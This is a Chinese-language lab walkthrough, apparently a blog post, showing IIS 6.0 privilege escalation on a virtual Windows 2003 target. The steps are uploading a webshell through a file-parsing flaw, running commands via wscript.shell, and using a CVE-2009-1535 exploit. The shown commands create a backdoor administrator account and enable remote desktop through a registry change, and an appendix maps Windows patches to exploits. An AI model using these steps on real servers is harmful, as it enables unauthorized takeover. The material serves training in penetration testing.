我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!!

文章目录

    • 一、Windows IIS6.0溢出提权
      • 1、Windos提权简介:
      • 2、程序权限的对比:
      • 3、 漏洞利用过程:
        • (1)实验环境:
        • (2)靶机链接:
        • (3)实验过程:
        • 附1:部分系统漏洞对应补丁号
        • 附2:aspx权限高于asp的示例

一、Windows IIS6.0溢出提权

1、Windos提权简介:

        window 服务器常用的是win2003、win2008和win2012。在渗透测试中 ,我们获取的权限是iis_user用户组 ,要更高的权限就需要把当前的用户提权到系统用户或超级管理员用户组。更高的权限方便我们在后续的渗透中,扩大范围测试。

2、程序权限的对比:

        在iis里面,权限依次的大小对比:aspx>php>=asp,aspx默认能执行终端命令、php和asp如果不能执行命令,在wscript.shell组件没有删除的情况下,可以上传cmd到可执行目录从而执行终端命令。

3、 漏洞利用过程:

(1)实验环境:

1.靶机环境:(1)虚拟机Windows2003【upload.moonteam.com】【192.168.97.132】(2)脚本语言环境:php/asp/aspx语言环境均存在2.攻击机:(1)虚拟机Win7【192.168.97.130】(2)Firefox+Burpsuite+蚁剑+大马3.网络环境:(1)VMware搭建的NAT网络

(2)靶机链接:

URL:http://upload.moonteam.com/upload_6.php

(3)实验过程:

第一步: 访问靶机链接,经过一系列的测试,发现这个是IIS6.0文件解析漏洞,因此可以通过漏洞特性上传大马。

第二步: 上传大马


第三步: 访问大马http://upload.moonteam.com/upfile/heroes.asp;.jpg #大马密码为heroes

第四步: 点击[服务信息 组件支持]模块,查看命令执行组件wscript.shell组件是否删除

第五步: 点击[RECYCLER]模块,从而查看回收站目录。

第六步: 点击[上传文件模块],从而上传cmd.exe到回收站目录下。

第七步: 点击[CMD执行]模块,然后填写SHELL路径以及要执行的命令,最后勾选WScriptShell组件和点击执行,从而测试cmd.exe的whoami命令。


第八步: 点击[CMD执行]模块,执行命令systeminfo,保存下来结果到本地的systeminfo.txt。

第九步: 利用脚本wes.py,执行python wes.py systeminfo.txt > res.csv命令,跑出漏洞,保存到res.csv

第十步: 分析res.csv,检索漏洞,发现CVE-2009-1535的IIS6.0提权漏洞

第十一步: 点击[上传文件模块],从而上传IIS6.0.exe到回收站目录下,但是发现上传失败,这里我们再去上传一个专门用来上传文件的大马,再去上传IIS6.0.exe


第十二步: 访问大马,http://upload.moonteam.com/upfile/up.aspx #密码admin,上传IIS6.0.exe提权工具到回收站目录下

第十三步: 回到一开始的大马,进入[CMD执行]模块,键入C:\RECYCLER\IIS6.0.exe "whoami" #注意执行命令的格式

第十四步: 依次输入以下命令,从而创建用户demo1,加入到管理员组,开启3389端口,远程连接靶机。
C:\RECYCLER\IIS6.0.exe "net user demo1 123 /add"                                       #添加用户

C:\RECYCLER\IIS6.0.exe "net localgroup administrators demo1 /add"         #加入管理员组

C:\RECYCLER\IIS6.0.exe "net user"                                 #查看创建的用户

C:\RECYCLER\IIS6.0.exe "netstat -ano"                            #查看开启的端口

C:\RECYCLER\IIS6.0.exe "REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal\" \"Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f"                                                                      #开启3389

C:\RECYCLER\IIS6.0.exe "netstat -ano"                            #查看开启的端口

最后一步: 键入win+r,输入mstsc,填写靶机ip,刚刚创建的账号,从而达到远程登录的目的。


附1:部分系统漏洞对应补丁号

Win2003

KB2360937|MS10-084KB2478960|MS11-014KB2507938|MS11-056KB2566454|MS11-062KB2646524|MS12-003KB2645640|MS12-009KB2641653|MS12-018KB944653|MS07-067KB952004|MS09-012 PRKB971657|MS09-041KB2620712|MS11-097KB2393802|MS11-011KB942831|MS08-005KB2503665|MS11-046KB2592799|MS11-080KB956572|MS09-012烤肉KB2621440|MS12-020KB977165|MS10-015Ms ViruKB3139914|MS16-032KB3124280|MS16-016KB3134228|MS16-014KB3079904|MS15-097KB3077657|MS15-077KB3045171|MS15-051KB3000061|MS14-058KB2829361|MS13-046KB2850851|MS13-053EPATHOBJ 0day 限32位KB2707511|MS12-042 sysret -pidKB2124261|KB2271195 MS10-065 IIS7KB970483|MS09-020IIS6

Win2008

KB3139914|MS16-032KB3124280|MS16-016KB3134228|MS16-014KB3079904|MS15-097KB3077657|MS15-077KB3045171|MS15-051KB3000061|MS14-058KB2829361|MS13-046KB2850851|MS13-053EPATHOBJ 0day限32位KB2707511|MS12-042 sysret -pidKB2124261|KB2271195MS10-065 IIS7KB970483|MS09-020IIS6

Win2012

KB3139914|MS16-032KB3124280|MS16-016KB3134228|MS16-014KB3079904|MS15-097KB3077657|MS15-077KB3045171|MS15-051KB3000061|MS14-058KB2829361|MS13-046KB2850851|MS13-053EPATHOBJ 0day限32位KB2707511|MS12-042 sysret -pidKB2124261|KB2271195MS10-065 IIS7KB970483|MS09-020IIS6

附2:aspx权限高于asp的示例